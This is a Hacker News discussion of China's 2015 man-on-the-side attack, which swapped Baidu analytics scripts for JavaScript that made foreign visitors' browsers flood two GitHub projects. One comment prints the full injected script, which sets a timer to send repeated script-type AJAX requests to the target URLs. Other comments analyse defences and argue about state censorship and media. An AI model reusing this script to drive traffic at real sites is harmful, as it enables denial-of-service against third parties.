Hacker News new | past | comments | ask | show | jobs | submit login
China's Man-On-the-Side Attack on GitHub (netresec.com)
692 points by netresec on March 31, 2015 | hide | past | favorite | 309 comments



Since the question of "why" and "how" is coming up again, here's a quick summary I posted on reddit:

From a few different analysis on HN and elsewhere... Baidu has an analytics product and an ads product, much like Google Analytics and Google AdSense, which are used on all kinds of websites via Javascript. China has set the Great Firewall of China to modify some of Baidu's assets so that any non-Chinese IP gets a modified version of the Baidu analytics and ad code. The modification causes every web browser visiting a Chinese site using a Baidu analytics/ad product to load files from the greatfire and cn-nytimes projects on github (both of which are designed to circumvent Chinese government censorship) once every 2 seconds. The effect is that people all over the world outside of China are unwilling participants in a DDoS against github.

github has responded by taking both projects offline and replacing their content with a simple Javascript alert that shows a "WARNING: malicious javascript detected on this domain" messagebox. This causes the folks visiting baidu-infected sites to see the alert and know something is wrong with the website (hopefully not visiting it again). It also prevents the malicious Javascript from executing in a loop and reloading the site every 2 seconds.

One takeaway is that you should always have a backup of your code and resources outside a single central site like github. Another is that you should never ever have any webpage configured to load any resources from a server hosted within China IP address space as it is vulnerable to this sort of attack by the Chinese government.


The takeaway from this attack is the same as we got from the Snowden disclosure: Nations will abuse network services that is located on their borders. They will hack-tap-and-steal, modify, block, and use any method available to distribute malware. Any action is viable so long there is a target to attack which could produce political, economical or military advantages.

I suspect we will reach a point where treaties are needed to protect the basic building blocks of the Internet. We can't expect nations to respond by sending in military force, or voluntary give up the benefits from this kind of attacks. This leaves few options left if one want the economic benefits from cloud services and similar shared-network concepts.


I like to grab old books at yard sales, and found this an interesting read (Arms Control Disarmament And National Security, 1961, https://archive.org/details/armscontroldisar013124mbp). It's a collection of essays by various authors on a variety of arms control subjects.

Everyone sees nuclear / Cold War negotiations in hindsight, but in 1961 (and probably also ~1950) the logic is much more interesting, given that the theories were developed from a position of profound ignorance. How would things turn out? What did the other side actually want? How reasonable was the other side? Unknown!

On a technical point, is there a reason that javascript doesn't tend to be signed in any way? Or is it? Even if you're serving unsecured content for whatever reason, it'd be nice to allow the user to verify the code they received was as you intended. (Admittedly, encrypting all traffic as a default solves this)


On a technical point, is there a reason that javascript doesn't tend to be signed in any way?

A good point. I think it's convenience that we don't do it, but I'd hope we move in that direction. It seems like a prudent move.


> A good point. I think it's convenience that we don't do it, but I'd hope we move in that direction. It seems like a prudent move.

After a bit of Googling, (a) http://stackoverflow.com/questions/1368164/javascript-code-s... (b) http://www-archive.mozilla.org/projects/security/components/...

It seems it's simultaneously too difficult to do without ECMA spec support & would require a certificate chain anyway. And if you're running a cert chain infrastructure, why not use the one that already exists and run TLS?

Other side thought: with regards to the usefulness & impracticality of cert pinning, has any work been done on systems specifically designed to target low % injection systems? If 1/10 visitors gets the poisoned page, then it seems you'd have a 9/10 chance to pull a good page for comparison & verification if you (or a proxy you trust) made another request from a different IP.


In this case, the problem with any kind of technical workaround on the server side is that Baidu is under the jurisdiction of the government implementing the DDoS and is thus unlikely to be able to actively work to defeat it. If another country tried to do the same... well, that's what HTTPS is for.


HTTPS is not secure when we talk about China it is false sense of security! Last case 7days ago: http://www.theregister.co.uk/2015/03/24/google_ssl_cnnic/


That's fairly off topic - I mentioned that HTTPS is somewhat irrelevant here since Baidu is located in China, and anyway a forged certificate could not be used in a mass attack like this one since the issuing CA would come to the attention of browser vendors rather quickly. For the record, hopefully Google's upcoming Certificate Transparency feature in Chrome will help address the general issue, although who knows what kind of adoption it will have in practice.


> Another is that you should never ever have any webpage configured to load any resources from a server hosted within China IP address space as it is vulnerable to this sort of attack by the Chinese government.

Yep. Baidu are a NASDAQ listed company, while they may not be the malicious actor here, they still have a responsibility to ensure their networks are not used to attack others - which they don't seem to be taking seriously.

Until Baidu take steps to ensure their networks are not used to attack others, we should drop their packets: https://news.ycombinator.com/item?id=9295617


Baidu network is not used. The response is altered as the trafic goes out of China. The only thing they can do is hosting http://hm.baidu.com in another country.


> The response is altered as the trafic goes out of China.

By locating their network inside China, Baidu is allowing a malicious actor to leverage their network traffic - which indeed is a 'use' of Baidu's network.

> The only thing they can do is hosting http://hm.baidu.com in another country.

Most likely, yes. And until they do so, or come to another solution, their traffic should be blocked.


If their traffic gets blocked by other countries they could mitigate the revenue loss by having some capacity outside China and make sure that most accesses to their property coming from outside China goes to the servers hosted outside China (geo dns or anycast routing).

This would restore their analytics infrastructure functionality and avoid being exploited by their own government for such kinds of attack, while being justified as an infrastructure scalability concern (to avoid backslashes by the Chinese government).


So what's the rule then? Block all packets coming out of countries with governments that do MITM attacks? Blame the companies for not locating their servers in other countries? Companies like GitHub? This is so hypocritical.


> So what's the rule then? Block all packets coming out of countries with governments that do MITM attacks?

Block packets from any company that does not take reasonable steps to stop its network from being used to attack others.

This has been networking rule for a long time.

- We block open mail relays

- we block hacked Windows XP machines

- we should block a company who's in a hacked data center where their upstream adds malicious JavaScript.

Edit: 'we' = network administrators.


I assumed you were talking about our governments when you said we. Who's stopping you from blocking whatever you want? Or from creating a public block list for that matter. You have to convince me to install it on my machines though. :P


I think they are addressing their fellow network admins with that comment


They probably should use a global, non-chinese CDN to avoid this. That and HSTS and HTTPS to pin certs.


Does that mean we should drop everything coming from US prefixes also because the NSA uses them for man-on-the-side attacks?


Replying to myself as HN won't let me reply to the post by 'nailer

> If there is a specific network being leveraged by the US government to attack someone else, and the owner of the network is not taking steps to prevents its misuse, then yes, of course.

We have documented evidence of GCHQ doing man-on-the-side attacks against visitors of LinkedIn and slashdot.org. So are you currently blocking the prefixes of LinkedIn and SourceForge, Inc. on your networks? Or are you aware of any specific acts of these companies to prevent this from being possible in the future?

I worry about mass surveillance and national firewalls no matter where they come from, but I don't think balkanising the internet is a good response.


If there is a specific infrastructure being leveraged by the someone to attack someone else, and the owner of the infrastructure is not taking steps to prevent its misuse, then yes, of course.

Edit: yes, throwaway7767, this means any company. However LinkedIn, in this case, was being spoofed, and LInkedIn's infrastructure was not used: http://www.spiegel.de/international/world/ghcq-targets-engin...

Edit 2: no, throwaway7767, Baidu's infrastructure - their bandwidth, their customers, and location within the Chinese Firewall are being used to attack GitHub. Baidu has control over where they locate their servers. Baidu are not exercising that control.


Apparently I can now reply further into the thread, must be a timed thing.

> Edit: yes, throwaway7767, this means any company. However LinkedIn, in this case, was being spoofed, and LInkedIn's infrastructure was not used: http://www.spiegel.de/international/world/ghcq-targets-engin....

LinkedIn was indeed being spoofed, which is exactly what was being done to baidu in this case we are discussing. So it seems to be we now agree that blocking baidu would not be appropriate?

> Edit 2: no, throwaway7767, Baidu's infrastructure - their bandwidth, their customers, and location within the Chinese Firewall are being used to attack GitHub. Baidu has control over where they locate their servers. Baidu are not exercising that control.

And in what way is this different than the attack on LinkedIn we were discussing? Please be specific.

I've already said I disapprove of these methods regardless of who applies them, but you have not seen fit to specifically state that companies like linkedin should move all their servers outside the US/UK/FVEY countries, reserving that course of action only for chinese companies.


>> If there is a specific infrastructure being leveraged by the someone to attack someone else, and the owner of the infrastructure is not taking steps to prevent its misuse, then yes, of course.

> you have not seen fit to specifically state that companies like linkedin should move all their servers outside the US/UK/FVEY countries, reserving that course of action only for chinese companies.

Yes, I have. See quote above.


actually both projects are still online on github.

https://github.com/cn-nytimes

https://github.com/greatfire


They are back on github now; they were indeed temporarily changed to return only

    alert("WARNING: malicious javascript detected on this domain");
(or something similar). I saw this myself.


Actually, they never stopped being accessible from the "usual" link : https://github.com/greatfire . The alert was only sent for requests to https://github.com/greatfire/ (notice the leading slash).


From the Sony pictures incident to the attack on that satirical magazine in Paris to this, it's getting pretty tiresome having to deal with authoritarian types who believe they should dictate what other people can say or access.

For those curious, see below for a write up of the malicious javascript (uses a simple ajax call & random number timer): http://insight-labs.org/?p=1682

document.write("<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js"> \x3c/script>"); !window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");

startime = (new Date).getTime();

var count = 0;

function unixtime() { var a = new Date; return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3 }

url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];

NUM = url_array.length;

function r_send2() { var a = unixtime() % NUM; get(url_array[a]) }

function get(a) { var b; $.ajax({ url: a, dataType: "script", timeout: 1E4, cache: !0, beforeSend: function() { requestTime = (new Date).getTime() }, complete: function() { responseTime = (new Date).getTime(); b = Math.floor(responseTime - requestTime); 3E5 > responseTime - startime && (r_send(b), count += 1) } }) }

function r_send(a) { setTimeout("r_send2()", a) } setTimeout("r_send2()", 2E3);


Loading all of jQuery seems a little bit excessive when the only thing they're using is the $.ajax function. http://youmightnotneedjquery.com/#request


It's excessive if your goal is _solely_ to execute a repeating AJAX request. But, if I'm understanding the attack correctly, this script is injected _in place of_ jQuery requested from Baidu's CDN. If you want the affected sites to appear normal, so the users whose browsers you are highjacking will contribute to the DDOS for the longest possible period, then you want to ensure that jQuery does indeed load.

The OP further clarifies why jQuery is injected _twice_: seems the injection is occurring only for 1% of requests. So it appears the code is looking to see if it has triggered the injection itself, and fires another request if needed.


On which side are you ._.


Engineers don't care what side anybody is on, as long as the tech works.


> Engineers don't care what side anybody is on, as long as the tech works.

Good engineers do care. Don't mistake "being an engineer" with "being apathetic".


Really?

We knew the world would not be the same. A few people laughed, a few people cried, most people were silent. I remembered the line from the Hindu scripture, the Bhagavad-Gita... "Now, I am become Death, the destroyer of worlds."

Any engineer worth his salt absolutely understands the consequences of their actions on the world. Sometimes they understand a bit too late.


He still went along with it.


hey buddy


What's up pvam


> the Sony pictures incident

Most likely unrelated to North Korea and used for propagandistic purposes (including publicity for a below par movie).


That was done to the urls with a trailing slash, which was being used (incorrectly) by the DDoS script.


Wait, how does that work? Looking at the malicious javascript code issuing ajax requests to github, it doen't seem github's response is evaluated. Is this alert even displayed?

If that is the case, why not do something even more radical in the response like changing the targeted urls ? They could replace them by baidu urls for example, effectively transforming a DDoS against github into a DDoS against baidu (not saying baidu is the author of the attack here, but that would certainly have an impact on the traffic being monitored by the GFW).


The dataType is set to "script" in the AJAX request options. Per the jQuery docs (https://api.jquery.com/jquery.ajax/#jQuery-ajax-settings), this dataType causes the response to be evaluated as JavaScript in the browser.


They were still online, only the URL with a trailing slash was replaced. Links to the repository on GitHub itself were still working.


Ah, thank you for the correction.


From what I saw, it returned the alert only when the request had a trailing slash.


There still seems to be some special handling of them. Accessing these two projects through tor fails with an angry-looking unicorn and the message "Something went wrong and we cannot service your request". All other github projects seem accessible.


One solution that comes to mind for this is for CDN's to have an edge node just outside of the great firewall of China. Even with a simple edge side include, the impact on Github's servers should be near zero.


This won't work because it's browsers outside of China that are being hijacked when browsing Baidu Analytics-using sites.


That's a fair point...

Still, this is a read-based DoS. It should be fairly easy to mitigate with a CDN...


Putting a dynamic app like Github behind a CDN with page-caching just does not work. Sure they could freeze those projects and serve what is now essentially static HTML, but in day-to-day operations you're left using CDN products that let you serve static parts separately from dynamic parts, which is probably of dubious benefit during a DoS attack.


Github has got a bit of a read mostly situation. If read requests where funneled so that there was only one per URL per edge node at any given point in time (which edge side includes effectively gives you), it would make for pretty easy to manage load for Github.


Since this is the technique they used, the browsers would have sent referring URLs as part of each request. When traffic begins to spike suspiciously, why not send a headless browser to each referrer, and if any code on the referrer results in automatic loading of the domain you're trying to protect, blacklist it. I'm guessing that the bulk of the requests were referred by a relatively small number of pages/domains, so this would be a small processing task with a big payoff. This would effectively kill the use of this technique.


Unfortunately, the countermeasure for this sort of sniff already exists: the attacking referrer detects traffic from the victim's IP range and returns a sanitized copy of the content with the automatic loading logic removed. "Nothing to see here, officer."

It's a big programming task for a small processing task for a temporary payoff.


There's nothing that says the headless requests would have to come from the victim's IP range. Any cloud service could be used. Also, since open source headless browsers already exist (phantomjs et al), it's a small programming task.


Wouldn't it be awesome if GitHub somehow exposed issues / pull requests / etc as actual git repos for each project, like they do for wikis? Seems like that would mitigate much of the risk associated with centralized issue tracking.

And yes, I'm aware that all the data is already accessible via their API, but that's not quite as easy to deal with as a simple "git clone". For now, perhaps something like https://backhub.co/ could help, but I'd like to have the option to self-host (which doesn't appear to be the case for BackHub).

EDIT: Something tells me they'd never do that, simply because their business model doesn't stand to benefit from it. But hey, I can dream.


Yeah, I was thinking the same thing as your edit. Once GitHub makes it easier to become independent of them, then it... well, becomes easier to become independent of them.


I've thought about this as well. Should be possible to store the data in the repo itself. Later we can add a gui to make things easy. I believe that we can let their existing api schema determine the format. I'd like to do it in node because of its portability and ubiquity. Pm me if you are interested in helping.

Big decision is whether to store the issues and other metadata in a seperate branch or not.


Do those requests show up as coming from China? I thought it was only people outside China who are being giving the poisoned javascript, and the requests are being made on the client-side from them - which would appear to be just random traffic?

Perhaps Baidu still shows up as the referring URL, though?


the requests are coming from the computers outside of china (that access chinese sites), thus you cannot simply BGP null-route all Chinese prefixes to mitigate this.


    > I thought it was only people outside China who are being 
    > giving the poisoned javascript, and the requests are
    > being made on the client-side from them - which would
    > appear to be just random traffic
I would have thought you could usefully heuristically look at the referrer header.


So I asked this before, and will ask it again.

If I'm a start-up, or any "hot" website, do I have anything to gain by allowing myself to be reached by computers inside China's IP space? Same for Russia, North Korea? All 3 are known to be the source of many disruptive attacks, neither of the 3 are important markets, with the exception of China, where they've decided to re-implement all non-Chinese internet services anyway.

I'm honestly curious. I'm in the process of launching a project of my own and wonder if there's any reason to not attempt to blacklist China/Russia en masse?


"One takeaway is that you should always have a backup of your code and resources outside a single central site like github."

  ssh user@rsync.net "git clone git://github.com/freebsd/freebsd.git freebsd"
Done and done.


Wondering if Github has reported this to law enforcement agencies and knowing origin of attack - how will FBI etc proceed? Will we get a statement from administration itself on the lines of Sony hacking or trade relations are too big to endanger?


I have my doubts about the technical competency within the presidential administration(healthcare.gov for example). Such huge attacks would not take place if we had any effective retaliation and protection capacity.


I think you got it wrong. The Baidu analytics code is not on the pages that are on GitHub. It is all over the place, and the Great Firewall occasionally swaps it out for the malicious script. There is no malicious code on the GitHub pages.


You must have misread because they never said anything like what you're claiming they said here.


This is what they wrote:

In short, this is how this Man-on-the-Side attack is carried out:

An innocent user is browsing the internet from outside China.

One website the user visits loads a javascript from a server in China, for example the Badiu Analytics script that often is used by web admins to track visitor statistics (much like Google Analytics).

The web browser's request for the Baidu javascript is detected by the Chinese passive infrastructure as it enters China.

A fake response is sent out from within China instead of the actual Baidu Analytics script. This fake response is a malicious javascript that tells the user's browser to continuously reload two specific pages on GitHub.com.

Nowhere do they say that the script is only injected into the pages from GitHub.


For me the most interesting thig about this incident is how the GFW is being used offensively. Most other governments so far have protested online censorship from a kind of moral standpoint, but not from a security standpoint per se. Now it's quite clear the GFW is being leveraged offensively - did anyone spot this capability previously?


It only really ramped up this year.

http://furbo.org/2015/01/22/fear-china/


Don't know why your comment has been voted down, that's an interesting link and blog post and totally relevant to this thread :\


Don't underestimate the chinese capability to down vote


It's an identical setup to the NSA QUANTUM infrastructure, just in China instead of scattered around the western internet system. So I guess it's probably been used offensively in a more targeted approach for a while.


you mean in principle or in the actual detail/technology?


The actual detail/technology, more or less. There's nothing China did this last couple of weeks that the Five Eyes' QUANTUM setups aren't already tooled to do: QUANTUMINSERT can be used to inject the JavaScript, just change the selectors and the payload. Indeed, I believe this capability has already been privately trialled by GCHQ. (QUANTUMSLAMMER, was it?)

It is not advanced technology: TCP just has no protection here. Anyone capable of in-path packet surveillance and in-/by-path packet injection on a significant link can pull off this exact same attack. You could co-opt a router to do it: GCHQ have.

We're going to need pervasive (authenticated) encryption to defeat it.


I believe this is precisely the method GCHQ used to compromise Belgacom, for the purposes of spying on the EU. They used QUANTUMINSERT to inject an exploit payload into connections from belgacom employees to LinkedIn and slashdot.


Although in those, they targeted using pretty close selectors and the payload was browser exploits with a very advanced dropper from what is essentially a big, supported modern malware construction kit. GCHQ used the same technique, but leveraged it to do a very different - and actually far more intrusive and destructive - thing.

This, by contrast, is a widely-targeted, fairly dumb DoS payload - but of course, not every DDoS has to be smart! Scale does all the work, and dropping malware, albeit relatively benign malware, en masse like this yields a lot of scale. This is particularly bad when there are potentially more personnel adapting it to evade defenses than there are personnel trying to defend against it: bravo to the GitHub security team!


It seems the only solution might be to block all content from China? Great - now they have the firewall working both ways.


I had to do that for a website I ran a while ago. It's unfortunate but at the end of the day blocking China means that the rest of the world can continue to use your services legitimately.


I still don't really get it. What's the actual goal behind the attack? When the Chinese government decides to block a website, I can at least understand their motivations, as bad as they may be. But DDOSing Github just seems to be pissing the whole world off for a few hours without any actual long term consequences.


Actually, someone here (who I cannot remember) said quite eloquently yesterday that our biggest export--and "influence" on the world--is culture.

For the first time I realized that pissing people off may, in fact be the objective as the other reply stated.

China and Russia are both (quite unique) examples of countries with an unfathomable degree of control over their citizens. It can be hard to grasp occasionally, coming from a western mindset but for the vast majority within said countries, the entire reality they see and what they believe to be true is heavily distorted--in that, it is defined by the vision of the oligarchy and information is carefully controlled to produce a desired set of beliefs. North Korea is an extreme caricature of this pattern.

Technology is naturally subversive to this as it lets people interact directly with other cultures and ideologies which may provide contrasting philosophies and--terrifyingly--the opportunity for free thought.

Restrict access to technology and you'll have a revolution. Instead, you become the "troll," or the "problem," and quietly become isolated from large areas of the network, all while reducing the amount of information you have to sift through before passing it along to the populace, in the name of security.

And while the effect on actual traffic may be minimal, it does make for a very cold perception which generally makes cross-cultural integration unlikely. How many western consumer-technology companies do you see integrating with Asia-based API's/demand, compared to other industry, let alone academics?


The difference between the U.S. and China/Russia is that the people in China/Russia know the media is controlled by the powers that be.

Here, our press is also "defined by the vision of the oligarchy and information is carefully controlled to produce a desired set of beliefs." We just believe that it's free.

See: http://en.wikipedia.org/wiki/Manufacturing_Consent


No, the difference is that in the west you can access Russia Today (http://www.rt.com) and China Daily (http://www.chinadaily.com.cn/en/), state-owned propaganda channels who delight in publishing anything that would make the U.S. look bad, and in China you can't access the NYT which helped break the Snowden stuff. The Guardian is owned by a trust who have legal obligations based on fair and balanced reporting, and all TV news in the UK - including Murdoch's channels - have a legal obligation to not editorialised, underpinned by a legal system that's been sticking two fingers to vested interests since the Magna Carta. Your sense of perspective is broken.


Oddly, the Guardian is in fact not owned by a trust any more. It's owned by a private corporation that calls itself The Scott Trust, but it stopped being an actual trust in 2008.


That's true, though they seem to be trying to set up the corporation in a trust-like way. It has a corporate charter that prohibits dividend payments, makes it difficult to cash out any profits, requires the company to treat its newspaper assets in certain ways, etc. I don't know how bulletproof that arrangement is, though.


The Snowden/NSA stuff doesn't fall outside of oligarchical perspectives. Tons of Silicon Valley companies for example, some of the most valuable in the world, are super anti domestic spying.

The U.S. media system vigorously debates stuff that falls within the elite spectrum of opinion. But on issues that fall outside of that it is quite propagandistic. In fact that vigorous debate masks the ultimate bias of it. For example, major media is usually very nationalistic about U.S. wars. There may be some debate about how costly they are (to us) but rarely over their morality. That's why you can hold up Snowden as an example, but not the U.S. wars in the Middle East.


    > doesn't fall outside of oligarchical perspectives
http://en.wikipedia.org/wiki/No_true_Scotsman

    > within the elite spectrum of opinion. But on issues that
    > fall outside of that it is quite propagandistic
Occam's razor wants you to know that this means the elite have opinions on the same spectrum as the general public

    > major media is usually very nationalistic about U.S.
    > wars
US TV media is recently very nationalistic about U.S. wars; certainly weren't about Vietnam, for example. Accusing the NYT of being pro-Middle-Eastern war is a reach, and NYT is both the most respected newspaper in the US, but also, CRUCIALLY, the news source that is being censored here.


It is rather stupid to equate the degree of media manipulation in the West vs. China and Russia.


You are right. The degree and sophistication of media manipulation is profoundly greater in the west. While the Chinese block a lot of media, the manipulation is minimal. Most Chinese are very cynical and know exactly what is going on. The west, or at least the US, traps people in a matrix of sorts where they don't even see the manipulation. The narrative is exquisitely framed and guided to leave people with a sense of moral superiority and basic faith in the system despite perceived flaws, as is ironically exhibited by your comment.

edit: some good resources on the history and nature of western media manipulation are the BBC documentary "The Century of Self" and Noam Chomsky's book "Manufacturing Consent".


If you want to publish your own newspaper, you can. Nobody will stop you. Start your own online video news service, weblog or nes site - nobody will stop you. Post whatever you like to Reddit, or any other discussion platform.

In China and Russia you cannot do these things. Published mdeia are strictly monitored and censored. The state employs thousands of astroturfers to flood social media with pro-government messages, trash anti-government messages and even directly hook into messaging platforms to delete messages the government don't like. Be persistent at it, and you'll get a visit from the police, or just get beaten up a few times.

The very fact that the BBC could publish that report, and Noam Chomsky could publish his book, is strong evidence for freedom of expression in the west. There are no such equivalent sources published in Russia and China exposing their government's manipulations. Why do you think that is?


> If you want to publish your own newspaper, you can. Nobody will stop you. Start your own online video news service, weblog or nes site - nobody will stop you. Post whatever you like to Reddit, or any other discussion platform.

> In China and Russia you cannot do these things.

It's not as bad in Russia yet. But we are going there.


Yet that Guantanamo ex-prisioner has his book for sale everywhere except in the US... Care to guess why it isn't for sale in the US?


A handful of books banned for a few individual legal issues does not make for a suppressive state. Are you seriously arguing that the USA is more suppressive of coimmunications and publications that China? Really?


> Are you seriously arguing that the USA is more suppressive of coimmunications and publications that China? Really?

He never was. And as seen from the outside, you're completely making his point.


You can lose your job if you post too wrong views too much.

EDIT: I don't understand the downvotes. It is both relevant (it refutes that you can "Post whatever you like to Reddit, or any other discussion platform." without punishment), and correct.


I think because it is more a consequence of human nature than governmental activity (though in some measure they're intertwined, and so it's hard to say objectively).


> [...] is strong evidence for freedom of expression in the west.

Unfortunately there are less and less white spots in "the west."

https://index.rsf.org/


I won't argue with you that China is far more repressive and less free than the US, because you are correct in that assertion. I only state that the US is far more _manipulative_.


The U.S. media has nothing on Russian state television, they are quite consciously part of the government propaganda machine. They don't hesitate to use material like photoshopped 'satelite pictures' of Ukrainian fighter jets shooting down that Malaysian airliner and present it as validated evidence. They have presented 'proof' that American soldiers are fighting in the Ukrainian army, and debate outrageous conspiracy theories straight faced. Fox News has absolutely nothing on those guys.


The problem with your claim is that it is irrefutable as anyone denying it could be accused of being manipulated to do so (in fact you are accusing obstinate of just that)

In my view it is an authoritarian trap to defend direct political censorship by pointing to the inevitable force of group think called culture (including, of course, the media), as the latter always necessarily exists everywhere but the former can be abolished.

Manipulation is simply part of any culture. The more interesting question is what other forces there are in a culture to counter that manipulation. Political censorship is an attempt to suppress such counter forces, not a replacement for manipulation. Censorship is supposed to make maniuplation more effective.


Is it? Check out the CNN international edition and US edition on their website after a terrorist attack, and you'll see how blatant it can get (CNN is interesting in that respect since both versions are readily available from a selector at the top of their page). They don't even need to hide it - it's "sold as a feature" because most people are not interested in seeking out alternative viewpoints.

You see it even with more mundane cases in subtle differences in headlines even when they run the same articles. Many of the changes are perfectly reasonable and simply reflects differences in language or relative importance to different audiences. But a lot of the time there are blatant biases being introduced.

There certainly is a difference: In democratic countries people can get alternative viewpoints easily without risk of imprisonment if they want to. But unless they are already questioning the status quo, most people simply doesn't bother, so it doesn't make much real difference if they're censored or not.

As someone who has travelled quite extensively to the US for business, turning on the news channels when I arrived was always a shock, no matter how many times I did it, because even between the US and the UK, the difference in mainstream media world view is massive, and clearly one or both is heavily distorted (I'd go for both...).


Personally, I think...

(Well, I suppose that's an odd start, since half the problem with politics is people trusting their personal thoughts overmuch rather than gathering evidence. Then again, those who do gather evidence in politics, the softest science, rarely seem to find any that upsets their preconceived notions. Anyway-)

...that this would happen with or without any overt government interference. I'm sure that the soft pressure described by Mr. Chomsky plays a part, and that most government officials in democracies are happy that it exists.

But just look at smaller scales: say, at the umpteen "camp A vs. camp B" divisions that come up in one capacity or another on this site. JavaScript is a horrible language that's killing the web, or it's a cool language with some flaws. Go is a language firmly stuck in the 1980s with the goal of treating its programmers like disposable pawns[0], or it's a fluid pragmatic language with an emphasis on maintainability. Apple has a track record of producing shiny overpriced crap, or perhaps innovative products that usually beat the competitors'. Google is an advertising company and absolutely everything it does has some direct connection to invading its users' privacy, or it's a geeky paradise, tech culture's truest representative among large corporations. The NSA is a villainous organization through and through that's killing everything important about American freedom (common opinion on this site, not as pervasive elsewhere) or it's just doing its job and has little, if anything, to answer for. Feminism... well, I think that word is enough.

These are just some of the biggest examples; there are countless others, and obviously you can get far more examples by broadening the scope from tech. In each case, people tend to divide themselves based on their opinions into one of (usually) two opposing groups. Each group is self-reinforced by memes spreading through its echo chamber, each is very confident it's right, and importantly, eventually members of the two completely fail to understand each other, speaking with different terminology about different principles and both almost certainly far from objective neutrality. Some of the camps have some potential equivalent to Chomsky's cited explicit manipulation - c.f. the recent Fear of Apple post. Most don't. People self-manipulate, and they're rewarded with positive emotions generated from discussions with other people that share their views.

In politics, the camps form within political parties, geographical areas, and often entire countries. It would be interesting and powerful to think of ways to reduce this; on the other hand, I don't think it's fair to blame Western governments for what's basically human nature. My suspicion is that people look at the distortion of reality in democratic country X's politics, compare it to censored country Y's, find the proportion too large, and blame the government of X... but miss that a large portion of each side's distortion is natural, and if you subtract that from each side, the proportion gets far smaller. YMMV.

[0] opinions on Go aren't usually that strong, I think, but I've heard exactly that claim from one firebrand on Twitter.


Not at all. The Western governments simply have to hide it better.


I didn't equate them. I said mind control is worse in the West. And, I cited a detailed analysis of the topic.


"The difference between the U.S. and China/Russia is that the people in China/Russia know the media is controlled by the powers that be."

That knowledge, sadly, doesn't prevent from believing propaganda made by the same media. I know a lot of Russians, and most of them (even otherwise smart ones) honestly believe even the most absurd propaganda statements.


> China and Russia are both (quite unique) examples of countries with an unfathomable degree of control over their citizens. It can be hard to grasp occasionally, coming from a western mindset but for the vast majority within said countries, the entire reality they see and what they believe to be true is heavily distorted--in that, it is defined by the vision of the oligarchy and information is carefully controlled to produce a desired set of beliefs. North Korea is an extreme caricature of this pattern.

Perhaps you ought to read the retracted preface from Animal Farm [1].

[1]: http://home.iprimus.com.au/korob/Orwell.html


> [China] an unfathomable degree of control over their citizens

You obviously haven't been there. I think Chinese gov have the same level of control over its citizens as France: very erratic, sometime works well, some people try to play with fire, but overall the Chinese are all but lobotomized robots in the hands of a few puppet masters. There's over 500 strikes a year in China, not counting all the ones not big enough to be counted. I have seen streets of pedestrians walking against policemen, who were sweating of fear. Right now the prez is quite appreciated and trusted by the people, so he probably has some level of control, but this is earned by its fight against corruption, and not by some matrix-like brainwashing system.


I have been there ;)

You're misinterpreting the nature of control. Yes, there are protests, mostly because the government lets them happen. It helps people let off steam, it gives the government an indication of how people feel, and quite often there are conflicting interests which the Party can rise above (remember, government and the Party are not the same thing). So, often it's a bunch of workers protesting against a company, or a corrupt local official in one department - the Party can let that happen, and choose sides later when they've decided which way the wind is blowing. Policemen are shitting themselves because the Party mostly sides with the security apparatus but today they might let the protest get a bit wild if they want to allow the protesters a bit of leeway, and then those untrained, poorly equipped policemen will be screwed.

When stuff he Party doesn't like happens, they shut it down using methods you (on the whole) cannot do in France, the UK, and the U.S. Try introducing political censorship of material critical to Hollande. Try censoring books and courses in university. Try locking up journalists and writers (on tax evasion charges of course) when they say stuff you disagree with. Try rolling out the tanks when a protest gets out of hand. Etc.

So don't be fooled by the seemingly light hand of the gov - they've intentionally backed off from the Cultural Recolution level of control because they know that most people don't give a damn, and if left alone they will do nothing. How about an experiment - I'll hold up an anti government sign in front of the French parliament, and you do the same in Tiananmen Square and we'll see how much control the Chinese gov has ;)


"How about an experiment - I'll hold up an anti government sign in front of the French parliament, and you do the same in Tiananmen Square and we'll see how much control the Chinese gov has ;)"

Actually, i did just that 10 years ago, in front of the elysee ( white house french equivalent), alone, american style with my street sign ( although i didn't shout any sligan, i remained silent), and one policeman asked me my ID, went somewhere with it, gave it back to me, and told me to leave, saying "this is is not the US here".

But, yeah, nothing else happened. I wasn't beaten up or followed or spyed upon after that.


>>I wasn't beaten up or followed or spyed upon after that

How can you know?


> You're misinterpreting the nature of control.

I don't think so. I am just taking the other angle, from the people's perspective, and want to debunk the cliche that Chinese people are easy to control. They've had much more revolutions than any other country in their long history. They're all but easy to control. In French we say "like boiling milk", which means they can easily and suddenly get out of control and wash out anything on their way. Just blocking a few topics on social network is certainly not enough. As for things that are allowed or forbidden, it seems more cultural than anything else: In China direct verbal confrontation is very rare, while it is very common in the West, and this holds in families, in companies and also at the country's level. Not very surprisingly, in France insulting the head of state is not forbidden, and even something like a national entertainment. However, in France we have laws telling people if they are allowed to work on Sundays, which seems extremely weird and borderline "totalitarian" to the Chinese, which believe people should be allowed to work whenever they need to or want to.

Also, when talking about China, it needs to be reminded that in fact the core Western values (i.e. Enlightment values) and the core Chinese values (i.e. Confucean values) are very similar, and quite compatible. (See how fast Chinese immigrants adapt to and adopt Western values.) For instance, secularism and religious tolerance, equality of rights and before the law, meritocracy, etc.

I think the world is going very badly these days, and a big chunk of it is in the hands of people whose values are really opposed to the core of modern humanist values, and this chunk is not China. We'd better team up and fight (with ideas, not with guns) what really threatens humanity as a whole. Just my thoughts.


Hey, I didn't see it was you! Still at Douban?

I know what you mean in terms of "boiling milk" - in that respect I agree. I keep thinking these days of that old saying of China as a sleeping elephant; instead I think the people are the sleeping elephant. I think the government's strategy relies a lot on ignorance and apathy, but if even half of these stories we read as standard on NYTimes etc made it into the public consciousness, there would be huge issues.

About the laws - I guess it's not the actual content of the laws or relatively different values that illustrates control. Eg in your example about working on Sunday's - if you decided to fight one of those laws, you could do it openly and publicly and in principle it would be a fair fight. You might even embarrass the government or a political leader, but here there's so little chance of that - that's the different nature of the Communist Party control. The government/party has taken away avenues to legitimately discuss/debate/fight, so the options are either total apathy or explosive revolution. That's scary!


(Yes, still working for Douban)

> if you decided to fight one of those laws, you could do it openly and publicly and in principle it would be a fair fight.

Yes, but here you may have assumed that "openly and publicly" is a precondition for fairness. I do not think openness and publicity of fights is the only way to get fairness. Or at least this can be discussed and we should allow that, on one side openness is often faked, on the other that private and closed tractations may to some extent result in a decision or in a law that is efficient and corresponds to the long term better good of the concerned people (i.e. what they would really choose if given all the elements, and not disturbed by red herrings)

